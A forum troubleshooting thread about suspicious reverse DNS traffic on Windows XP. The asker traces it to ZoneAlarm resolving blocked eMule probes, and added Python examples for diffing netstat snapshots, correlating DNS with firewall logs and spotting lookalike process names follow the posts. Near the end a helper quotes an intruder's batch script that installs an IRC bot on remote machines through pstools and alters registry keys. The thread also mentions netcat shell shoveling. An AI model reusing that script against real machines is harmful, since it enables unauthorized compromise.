Selcon

asked on

Suspicious DNS activity

Hello,

I'm running Win XP Pro on an IBM ThinkPad T30. Recently, my laptop started performing internet accesses even though there should be none. When I reboot my system (to start afresh), my ZoneAlarm shows continuous internet accesses from scvhost.exe (Generic Host Process under win32). I fired up Ethereal and found tons of reverse DNS requests to weird addresses such as pc-62-30-198-107-sm.blueyonder.co.uk, p50915B1A.dip.t-dialin.net, adsl-213-190-42-6.takas.lt, 213-97-171-45.uc.nombres.ttd.es, some to surfer.at, some to wanadoo.fr, etc. etc.

I've tried running fport from foundstone, but it always returns an empty table/list.

Any ideas what is going on? and how to fix it?

Thanks!
liddler

First guess would be some spyware or virus. Download and run the excellent and free Ad-Aware (http://www.lavasoftusa.com/) to check for spyware, and run your AV software with the latest definitions.
 
Selcon

ASKER

I also ran Ad-Aware (with the latest refupdate) as well as a Norton Antivirus scan (with the latest db), but both turned up nothing.

What is running when you show the tasklist? Also, did you try running msconfig, checking the startup tab, and turning off programs from starting up?
Thanks,
Jackson
Selcon

ASKER

Yes I recently went through the startup programs in the registry and msconfig/startup tab.

Here's a dump from running tasklist (initial dump to check formatting)
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         20 K
System                         4 Console                 0         36 K
smss.exe                     636 Console                 0         52 K
Selcon

ASKER

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         20 K
System                         4 Console                 0         36 K
smss.exe                     636 Console                 0         52 K
csrss.exe                    688 Console                 0      3,036 K
winlogon.exe                 712 Console                 0        576 K
services.exe                 756 Console                 0      1,068 K
lsass.exe                    768 Console                 0      1,284 K
ibmpmsvc.exe                 956 Console                 0        160 K
svchost.exe                 1004 Console                 0      1,224 K
svchost.exe                 1112 Console                 0      7,404 K
svchost.exe                 1364 Console                 0      1,404 K
svchost.exe                 1448 Console                 0        764 K
spoolsv.exe                 1592 Console                 0        792 K
CDAC11BA.EXE                1772 Console                 0        224 K
defwatch.exe                1800 Console                 0        264 K
Runservice.exe              1824 Console                 0        264 K
rtvscan.exe                 1840 Console                 0      2,924 K
QCONSVC.EXE                 1864 Console                 0        264 K
svchost.exe                 1916 Console                 0      1,196 K
vsmon.exe                   1932 Console                 0      3,656 K
explorer.exe                 868 Console                 0     28,048 K
MSGSYS.EXE                  1300 Console                 0        208 K
SynTPLpr.exe                 276 Console                 0        452 K
SynTPEnh.exe                 360 Console                 0        864 K
rundll32.exe                 468 Console                 0        712 K
TPHKMGR.exe                  536 Console                 0        836 K
IMWEBSTA.exe                 668 Console                 0      1,008 K
NDetect.exe                  732 Console                 0      1,052 K
vptray.exe                  1092 Console                 0        868 K
dpps2.exe                   1492 Console                 0      1,140 K
evntsvc.exe                 1548 Console                 0        120 K
ctfmon.exe                  1560 Console                 0      1,940 K
kstatus.exe                 1028 Console                 0      1,532 K
zonealarm.exe                216 Console                 0      3,196 K
iexplore.exe                4004 Console                 0     19,200 K
iexplore.exe                2100 Console                 0     17,228 K
cmd.exe                     3224 Console                 0      1,628 K
tasklist.exe                 660 Console                 0      4,336 K
wmiprvse.exe                3616 Console                 0      5,012 K
I'm curious to see the results of "netstat -na" after a clean boot, to see who (if anyone) your computer is talking to.


Cheers,
Jason
At the time you checked your process list, did you have a command shell open?  I see cmd.exe in there, but did YOU open it?  Hackers often "shovel" shells to themselves using tools like netcat bound to cmd.exe (so they have total control over your computer remotely).  If you didn't launch cmd.exe, this would seem likely.  In that case, Jason Deckard is right, run netstat and see what ports are listening. It sounds fishy to me...

Also, some of the mystery addresses appear to be dial-in addresses which would suggest that the activity isn't advertisement related.  
yeah, thank the lord for the monitoring/closings of a ZA product.

blueyonder: http://www.bygames.com/
What is CDAC11BA.EXE? It looks similar to one of their code acronyms. And why... are you running so many explorers and DOS programs at plain simple startup?

Did you install a game and enable networking, phone access, and register via dialup?
ASKER CERTIFIED SOLUTION
JacksonGalloway
Selcon

ASKER

to newyhouse: yes, i opened the command window to run the tasklist command

to sunbow: two IE windows were open at that time, one to the experts-exchange website and another to google. Nope, didn't install any games recently.

to jackson:
Here is a dump of netstat -an currently without turning everything off (which i hate to do :). The suspicious DNS requests are still continuing right now when I am dumping the netstat -an results.

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1920           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    0.0.0.0:1027           *:*
  UDP    0.0.0.0:1086           *:*
  UDP    0.0.0.0:38037          *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1790         *:*
  UDP    127.0.0.1:1900         *:*
  UDP    192.168.0.69:123       *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*
  UDP    192.168.0.69:1900      *:*
Selcon

ASKER

192.168.0.69 is my internal IP address of my laptop by the way, i'm running my home network through a software NAT with a DSL provider (single ip). The gateway (just running the software NAT) is 192.168.0.1
Selcon

ASKER

Ok, I removed everything under the startup tab in msconfig, except for ZoneAlarm and Norton Antivirus. Haven't removed the services yet, but this is what I get. The reverse DNS activity is still continuing, and here's a dump of netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    0.0.0.0:38037          *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1900         *:*
  UDP    192.168.0.69:123       *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*
  UDP    192.168.0.69:1900      *:*

and here's a dump of tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         20 K
System                         4 Console                 0        224 K
smss.exe                     628 Console                 0        344 K
csrss.exe                    684 Console                 0      3,976 K
winlogon.exe                 708 Console                 0      2,340 K
services.exe                 752 Console                 0      2,916 K
lsass.exe                    764 Console                 0      5,296 K
ibmpmsvc.exe                 948 Console                 0      1,160 K
svchost.exe                  992 Console                 0      2,796 K
svchost.exe                 1100 Console                 0     19,820 K
svchost.exe                 1360 Console                 0      1,972 K
svchost.exe                 1372 Console                 0      3,376 K
spoolsv.exe                 1636 Console                 0      6,056 K
defwatch.exe                1820 Console                 0      1,384 K
Runservice.exe              1844 Console                 0      1,424 K
rtvscan.exe                 1904 Console                 0     10,488 K
QCONSVC.EXE                 1944 Console                 0      1,420 K
svchost.exe                 1972 Console                 0      2,676 K
vsmon.exe                   1992 Console                 0      5,532 K
MSGSYS.EXE                   552 Console                 0      2,100 K
explorer.exe                1084 Console                 0     24,084 K
vptray.exe                  2044 Console                 0      6,048 K
msconfig.exe                1756 Console                 0      5,040 K
kstatus.exe                  584 Console                 0      2,828 K
zonealarm.exe               1136 Console                 0      7,316 K
cmd.exe                     1656 Console                 0      1,572 K
tasklist.exe                1488 Console                 0      3,912 K
wmiprvse.exe                1164 Console                 0      5,032 K

Selcon

ASKER

Alright, I have stopped all services except for

DNS Client
Windows management instrumentation
Event Log
IBM PM Service
Plug and Play
QCONSVB
RPC
Security Accounts Manager
TrueVector Monitor (Zonealarm)
Windows Audio
terminal services

The first two (DNS and mgnt instru) can be stopped, but stopping DNS will not 'solve' the problem, and management instrumentation has lots of warnings against stopping it.
The rest of the services cannot be stopped.

This is the current netstat -an output

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    127.0.0.1:1067         *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*

and this is the current tasklist output (I've removed things such as cmd.exe, regedit.exe, etc., those which weren't present until I ran them)

System Idle Process            0                         0         20 K
System                         4                         0        128 K
smss.exe                     628                         0        232 K
csrss.exe                    684                         0      2,860 K
winlogon.exe                 708                         0      2,596 K
services.exe                 752                         0      2,648 K
lsass.exe                    764                         0      1,268 K
ibmpmsvc.exe                 948                         0        712 K
svchost.exe                  992                         0      2,348 K
svchost.exe                 1100                         0     13,648 K
svchost.exe                 1360                         0      1,708 K
QCONSVC.EXE                 1944                         0        948 K
vsmon.exe                   1992                         0      4,852 K
explorer.exe                1084                         0     25,376 K
zonealarm.exe               1136                         0      2,876 K
mmc.exe                     1076                         0     13,612 K
svchost.exe                  212                         0      2,712 K
wmiprvse.exe                1088                         0      4,300 K

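The three netstat -an dumps in this thread are the classic way to narrow down a listener: snapshot, disable something, snapshot again, and see what went away. Doing that by eye is error-prone, so here is an added example (my own code, not part of the thread) that parses the three dumps the asker posted and reports, per cleanup step, which sockets closed, which opened, and which survived every step. The port annotations are my own assumptions about typical XP-era owners of those ports; netstat -an alone cannot tell you which process holds a socket (on XP, netstat -ano adds the PID).

```python
"""Diff successive `netstat -an` snapshots to see what each cleanup step
actually closed.  Added example, not from the thread; the snapshots are
copied from the asker's posts and the port notes are my own assumptions."""
from __future__ import annotations
import re
from typing import NamedTuple


class Socket(NamedTuple):
    proto: str
    addr: str
    port: int
    state: str  # "LISTENING" for TCP; netstat prints nothing for UDP


# Assumption: typical XP-era owners of these ports, used only as labels.
PORT_NOTES = {123: "NTP", 135: "RPC endpoint mapper", 137: "NetBIOS name",
              138: "NetBIOS datagram", 139: "NetBIOS session", 445: "SMB",
              500: "IKE", 1900: "SSDP", 5000: "UPnP device host"}

# Matches "TCP  0.0.0.0:135  0.0.0.0:0  LISTENING" and "UDP  0.0.0.0:445  *:*".
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+(?:\s+(\S+))?\s*$")

SNAP_FULL = """
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1920 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1026 *:*
UDP 0.0.0.0:1027 *:*
UDP 0.0.0.0:1086 *:*
UDP 0.0.0.0:38037 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1790 *:*
UDP 127.0.0.1:1900 *:*
UDP 192.168.0.69:123 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
UDP 192.168.0.69:1900 *:*
"""
SNAP_NO_STARTUP = """
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1026 *:*
UDP 0.0.0.0:38037 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1900 *:*
UDP 192.168.0.69:123 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
UDP 192.168.0.69:1900 *:*
"""
SNAP_NO_SERVICES = """
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1026 *:*
UDP 127.0.0.1:1067 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
"""
SNAPSHOTS = [("full boot", SNAP_FULL), ("msconfig startup off", SNAP_NO_STARTUP),
             ("services stopped", SNAP_NO_SERVICES)]


def parse_netstat(text: str) -> set[Socket]:
    """Return the set of local sockets listed in one netstat -an dump."""
    socks = set()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            proto, addr, port, state = m.groups()
            socks.add(Socket(proto, addr, int(port), state or ""))
    return socks


def describe(s: Socket) -> str:
    return f"{s.proto} {s.addr}:{s.port} ({PORT_NOTES.get(s.port, 'unknown')})"


def changes_per_step(snapshots):
    """For each consecutive pair (label, dump): what closed and what opened."""
    out = []
    for (la, a), (lb, b) in zip(snapshots, snapshots[1:]):
        before, after = parse_netstat(a), parse_netstat(b)
        out.append((f"{la} -> {lb}", sorted(before - after), sorted(after - before)))
    return out


def persistent(snapshots):
    """Sockets present in every snapshot: the ones no cleanup step touched."""
    return sorted(set.intersection(*[parse_netstat(d) for _, d in snapshots]))


if __name__ == "__main__":
    for step, closed, opened in changes_per_step(SNAPSHOTS):
        print(step)
        for s in closed: print("  closed", describe(s))
        for s in opened: print("  opened", describe(s))
    print("never closed:", *[describe(s) for s in persistent(SNAPSHOTS)], sep="\n  ")
```

Run as-is, the diff shows that disabling startup items only removed TCP 1920 and three high UDP ports, stopping services removed SSDP/UPnP, NTP and IKE, and eight sockets (RPC 135, SMB 445, NetBIOS 137/138/139 and two RPC ephemeral ports) survived every step, which is exactly the baseline XP footprint. Nothing in the surviving set is a candidate for an outbound DNS talker, which is the point: the dumps never showed anything worth chasing.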
Selcon

ASKER

the troublesome thing is that every application on the system makes DNS requests through svchost.exe, and I have no idea how to make svchost report which application is making those requests or who it is returning the results to.

from the looks of the processes left in the tasklist (is there some way a process can hide from tasklist display?), it seems that i have a trojaned program
Selcon

ASKER

ok, i've found the source of the problem
ZoneAlarm was the one that's making the reverse DNS requests. It was blocking lots of packets directed to my laptop and resolving the source ips to display the hostname in the alert logs

and the reason I was getting so many packets was because I used to run eMule (a P2P program) and apparently eMule clients cache lists of IPs that have the file they want and they just keep probing to see if the client is alive.

Thanks for all the help, people!
(should I just award the points to whoever did the most work?)
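The resolution above is a useful triage pattern in its own right: reverse (PTR) lookups that your host emits are only suspicious if nothing on the host has a legitimate reason to resolve those addresses, and a firewall that writes hostnames into its alert log is such a reason. The added example below (my own code, not from the thread) checks that hypothesis mechanically by pulling the IPs out of the PTR queries and matching them against the source addresses in the firewall's block log. Both logs are constructed: the DNS lines mimic a text export of the Ethereal capture, the FWIN lines loosely follow a personal-firewall block log, and both layouts are assumptions; the first three peer IPs are the ones embedded in the hostnames the asker quoted, the fourth (the gateway) is made up to show a non-matching lookup.

```python
"""Check whether reverse-DNS (PTR) lookups leaving the host track the
source addresses the firewall is blocking.  Added example, not from the
thread.  DNS_LOG and FW_LOG are constructed and their formats assumed."""
import re
from collections import Counter

# "... Standard query PTR 107.198.30.62.in-addr.arpa"  ->  62.30.198.107
PTR_RE = re.compile(r"PTR\s+(\d+)\.(\d+)\.(\d+)\.(\d+)\.in-addr\.arpa", re.I)
# FWIN,<date>,<time>,<src ip>:<sport>,<dst ip>:<dport>,<proto>   (assumed layout)
FWIN_RE = re.compile(r"^FWIN,[^,]*,[^,]*,([\d.]+):(\d+),([\d.]+):(\d+),(\w+)")

DNS_LOG = """\
12:01:02.110 192.168.0.69 -> 192.168.0.1 DNS Standard query PTR 107.198.30.62.in-addr.arpa
12:01:02.340 192.168.0.1 -> 192.168.0.69 DNS Standard query response PTR pc-62-30-198-107-sm.blueyonder.co.uk
12:01:05.020 192.168.0.69 -> 192.168.0.1 DNS Standard query PTR 6.42.190.213.in-addr.arpa
12:01:07.800 192.168.0.69 -> 192.168.0.1 DNS Standard query PTR 45.171.97.213.in-addr.arpa
12:01:09.500 192.168.0.69 -> 192.168.0.1 DNS Standard query PTR 1.0.168.192.in-addr.arpa
"""
FW_LOG = """\
FWIN,2004/03/01,12:01:01,62.30.198.107:3412,192.168.0.69:4662,TCP
FWIN,2004/03/01,12:01:04,213.190.42.6:1190,192.168.0.69:4662,TCP
FWIN,2004/03/01,12:01:07,213.97.171.45:2211,192.168.0.69:4672,UDP
FWIN,2004/03/01,12:01:08,62.30.198.107:3412,192.168.0.69:4662,TCP
"""


def ptr_targets(dns_log):
    """IPs the host asked to reverse-resolve, in capture order (octets un-reversed)."""
    ips = []
    for line in dns_log.splitlines():
        m = PTR_RE.search(line)
        if m:
            ips.append(".".join(reversed(m.groups())))
    return ips


def blocked(fw_log):
    """Count blocked inbound packets per source IP and per (proto, dst port)."""
    by_src, by_port = Counter(), Counter()
    for line in fw_log.splitlines():
        m = FWIN_RE.match(line)
        if m:
            src, _sport, _dst, dport, proto = m.groups()
            by_src[src] += 1
            by_port[(proto, int(dport))] += 1
    return by_src, by_port


def correlate(dns_log, fw_log, threshold=0.75):
    """Share of PTR lookups whose target was a blocked source; verdict on that share."""
    ips = ptr_targets(dns_log)
    by_src, by_port = blocked(fw_log)
    matched = [ip for ip in ips if ip in by_src]
    unmatched = [ip for ip in ips if ip not in by_src]
    share = len(matched) / len(ips) if ips else 0.0
    if share >= threshold:
        verdict = "PTR lookups follow blocked inbound sources: the firewall's own hostname resolution"
    else:
        verdict = "PTR lookups do not follow blocked traffic: find the process issuing them"
    return {"matched": matched, "unmatched": unmatched, "share": share,
            "top_dst_ports": by_port.most_common(2), "verdict": verdict}


if __name__ == "__main__":
    result = correlate(DNS_LOG, FW_LOG)
    for k, v in result.items():
        print(f"{k}: {v}")
```

Two things fall out of the correlation that a raw packet list hides: the match rate tells you the lookups are a side effect of blocked inbound traffic rather than something the host initiates, and the destination-port histogram (here TCP 4662 and UDP 4672, eMule's default ports) tells you why the traffic is arriving at all. If the match rate were low, the next step is the one the asker was missing: on XP, netstat -ano and tasklist /svc give you the PID and the hosted services, which is how you attribute a socket to the right svchost instance.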
Selcon,

It seems *you* did most of the work :)

If you're taking suggestions, I think JacksonGalloway is most deserving of your points.
I'd sure like to know where we can get a handy list of those services myself, especially for the prime two mfrs (MS, IBM). ZoneAlarm is at least readable; it's the real name of the product.
Selcon

ASKER

Yup.
It is actually interesting because, since all apps do DNS through svchost, it is very hard to track down the culprit, especially if it could use DNS requests/replies to hide information, maybe with a special DNS server.

Okay. SCVHOST is NOT a Microsoft installed service. SVCHOST is. SCVHOST will look like a green U when pulled up in a search window. Removing it is a very long and hard process. It's an IRC bot dropped onto your local system that forces an FTP server to be run. It is accompanied by many, if not 10 or 20, other files which can be thrown in multiple places. From what I have seen, the most common places are the following:

C:\Winnt\System32\Drivers\etc\
c:\Winnt\Repair\
C:\Winnt\System\dump\   or Temp\
And others. You can locate it by just searching for the file SCVHOST, but do not delete it until you go to that directory and look for a batch file (*.BAT) there. It will probably have a file called Profile or IrOffer. If you find a BAT file in the directory, open it with Notepad. You will probably see something like the following.

mkdir \\%1\azkc\winnt\repair\iro
mkdir \\%1\azkc\winnt\repair\iro\ul
copy C:\iro \\%1\azkc\winnt\repair\iro
C:\pstools \\%1 -s c:\winnt\repair\iro\netlog install log "log" "c:\winnt\repair\iro\syslog.exe c:\winnt\repair\iro\sample.config" automatic
C:\pstools \\%1 -s c:\winnt\repair\iro\netlog install log2 "log2" "c:\winnt\repair\iro\sysbk.exe c:\winnt\repair\iro\sysbk.ini" automatic
C:\pstools \\%1 -s c:\winnt\repair\iro\reg update hklm\system\currentcontrolset\services\lanmanserver\start=3
C:\pstools \\%1 -s c:\winnt\repair\iro\reg update hklm\system\currentcontrolset\services\browser\start=3
C:\pstools\psshutdown -t 2 -r \\%1
If No Critical Errors Then %1 is ROOTED...


If this is found then you have been "Rooted" by some IRC junkie who is trying to serve files. You will see about 10 files like the following:

cygwin1.dll
netlog.exe
pkzip.exe
reg.exe
sample.config
ssleay32.dll
sysbk.exe
tzolibr.dll


Some of the files can be renamed, and will be by the attacker who planted them. But the .config is a definite, since IrOffer needs that as its extension.

If anyone needs any help just throw me an email back and i will be glad to walk anyone through the process in removing these.


Thanks,
Chris Allen
aka ScriptJunkie
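The svchost.exe / scvhost.exe confusion that runs through this thread is worth a mechanical check, because a lookalike name is the cheapest masquerade there is and the eye glosses over it in a 40-line tasklist. The added example below (my own code, not from the thread) parses tasklist output and flags any image name that is within one edit of a core Windows binary without being one. The distance used is optimal-string-alignment (Damerau) distance, so a single transposition such as scvhost counts as 1, not 2. The tasklist excerpt is the asker's first dump with one constructed scvhost.exe row appended to produce a hit; the set of "core" names is my own choice.

```python
"""Flag process names one edit away from a core Windows binary.  Added
example, not from the thread.  SAMPLE is an excerpt of the asker's tasklist
plus one constructed 'scvhost.exe' row; CORE is an assumed list."""
import re

# Assumption: the core XP processes worth protecting from lookalike names.
CORE = {"smss.exe", "csrss.exe", "winlogon.exe", "services.exe", "lsass.exe",
        "svchost.exe", "spoolsv.exe", "explorer.exe"}

ROW_RE = re.compile(r"^(\S.*?)\s{2,}(\d+)\s")  # "<image name>   <pid> ..."

SAMPLE = """\
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         20 K
System                         4 Console                 0         36 K
smss.exe                     636 Console                 0         52 K
csrss.exe                    688 Console                 0      3,036 K
winlogon.exe                 712 Console                 0        576 K
services.exe                 756 Console                 0      1,068 K
lsass.exe                    768 Console                 0      1,284 K
svchost.exe                 1004 Console                 0      1,224 K
svchost.exe                 1112 Console                 0      7,404 K
QCONSVC.EXE                 1864 Console                 0        264 K
vsmon.exe                   1932 Console                 0      3,656 K
explorer.exe                 868 Console                 0     28,048 K
iexplore.exe                4004 Console                 0     19,200 K
scvhost.exe                 2468 Console                 0      1,024 K
"""  # last row is constructed, not from the asker's dump


def osa_distance(a, b):
    """Edit distance where insert, delete, substitute and adjacent swap each cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[-1][-1]


def parse_tasklist(text):
    """Return (image name, pid) pairs from `tasklist` output, skipping the header."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2))))
    return rows


def lookalikes(rows, core=CORE, max_dist=1):
    """Names that are not a core binary but sit within max_dist edits of one."""
    hits = []
    for name, pid in rows:
        low = name.lower()
        if low in core:
            continue
        for target in sorted(core):
            dist = osa_distance(low, target)
            if dist <= max_dist:
                hits.append((name, pid, target, dist))
    return hits


if __name__ == "__main__":
    for name, pid, target, dist in lookalikes(parse_tasklist(SAMPLE)):
        print(f"PID {pid}: {name} is {dist} edit from {target}")
```

An exact name match is not a clean bill of health either: a malicious binary can be called svchost.exe and simply live outside %SystemRoot%\System32, and tasklist does not show paths. On XP the follow-ups are tasklist /svc (which services each svchost hosts) and, for the svchost instances, checking that the hosted service names are ones you recognise; a "svchost" with no services at all is the thing to look at first.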